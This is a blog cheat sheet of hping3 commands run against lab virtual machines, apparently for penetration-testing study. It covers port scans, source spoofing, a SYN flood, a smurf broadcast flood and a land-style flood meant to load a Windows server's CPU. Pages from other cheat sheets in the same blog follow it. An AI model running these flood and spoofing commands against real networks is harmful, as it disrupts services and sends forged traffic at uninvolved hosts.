Cheat Sheet : HPING

-

HPING 

Although Hping 3 is no longer being developed, it has been forked over to nmap as nping, here are some commands and examples using hping 3.
* TCP scan: hping 3 -V  --scan 1-100  -S  10.10.10.12  to scan the first 100 ports of the windows 2012 machine. (the  -S  is setting the syn flag).

* Lets spoof an address to port 80 on the server 2008 machine. 
Hping3  -I eth5  -a 1.2.3.4  -p 80  -S   -c 10  10.10.10.8   (-a for spoof)

* Now lets do a syn flood with random source addresses: 
Hping3  --flood  --rand-source   -p 80  -S 10.10.10.8

* Lets try sequence number prediction (will probably fail because windows implements alsr):
Hping3  10.10.10.8  --seqnum  -p 139  -S  -i u1  -I eth5

* Lets do an icmp ping (remember hping default is tcp. We will have to choose number 1 as that is icmp mode):
Hping3  -1  10.10.10.8

* Lets do an ACK scan Hping3  -A  10.10.10.8  -p 80, this should send an RST if open unless its windows, which this is so you will always get an rst

* Lets do an xmas attack :
Hping3  -F  -P  -U  10.10.10.8  -p 80 

* Smurf attack (doesn’t work with windows, because windows systems don’t respond to broadcast pings) run with wireshark to see the flooded traffic
Hping3  -1  --flood  -a  10.10.10.8  10.10.10.255

* Now lets do a Land attack,  bring up the server 2008 vm and bring up task manager and show the performance tab with the cpu:   
Hping3  -V  -c 1000000  -d 120  -S  -w 64  -p 445  -s 445  --flood  --rand-source  10.10.10.8     this should send  -d (data size)  120  with a count of 1000000  syn packets, with 445 as the destination and the source.  If you check the server 2008 machine you should see the cpu moving up quickly

Comments

Post a Comment

Popular posts from this blog

Cheat Sheet : Wireshark

-
 Now that you know some command line packet sniffing, lets go over some wireshark display filters: * If you want to filter by a protocol, just type it in, like arp, dns, etc.   * If you click the analyze tab you can filter here as well   * If you did it by tp, you can go to preferences/protocols/tcp and take the check out of “relative sequence numbers” and they will show the real seq numbers   * Right click a packet and follow tcp stream to see the whole conversation between the client and the server . if you do this and you close out of the window you will see that the filter is listed for these packets   * A source filter can be applied to restrict the packet view in wireshark to only those packets that have source IP as mentioned in the filter. The filter applied in the example below is: ip.src == 10.10.10.5   * A destination filter can be applied to restrict the packet view in wireshark to only those packets that have destination IP as m...
Read more

Cheat Sheet : Google Hacking

-
Google hacking is a great way to do some recon using advanced operators in the google search engine. Heres some examples: google hacking lessons: * google queries are not case-sensitive   * google doesnt use wildcard like most, it sees it just as another character   * google ignores certain common words, characters, and single digits in a search, but you can force google into using them by including them in quotes. You can also precede the word with a + sign like +and with no spaces between the + and the word "and"   * google limits searches to 32 words, but we could use wildcards to omit common words and extend that limit. so a phrase like "we the people of the united states in order to form a more perfect union establish jusice" is 17 words, but if i omit the common words and replace with wildcards: we * people * * united states * order * form * more perfect * establish *  would be couonted as 9 words   * if i do a phrase search, which means ...
Read more

Cheat Sheet : TCP Dump

-
Wireshark is a very popular packet sniffing tool, but sometimes you may be on a pentest and you only have a linux shell, no gui, no wireshark. Good thing is a lot of linux and unix machines come with tcpdump installed which is essentially a command line wireshark. Lets look at some examples: * First off, I like to add a few options to the tcpdump command itself, depending on what I’m looking at. The first of these is -n, which requests that names are not resolved, resulting in the IPs themselves always being displayed. The second is -X, which displays both hex and ascii content within the packet. The final one is -S, which changes the display of sequence numbers to absolute rather than relative. The idea there is that you can’t see weirdness in the sequence numbers if they’re being hidden from you. Remember, the advantage of using tcpdump vs. another tool is getting manual interaction with the packets. * It’s also important to note that tcpdump only takes the first 6...
Read more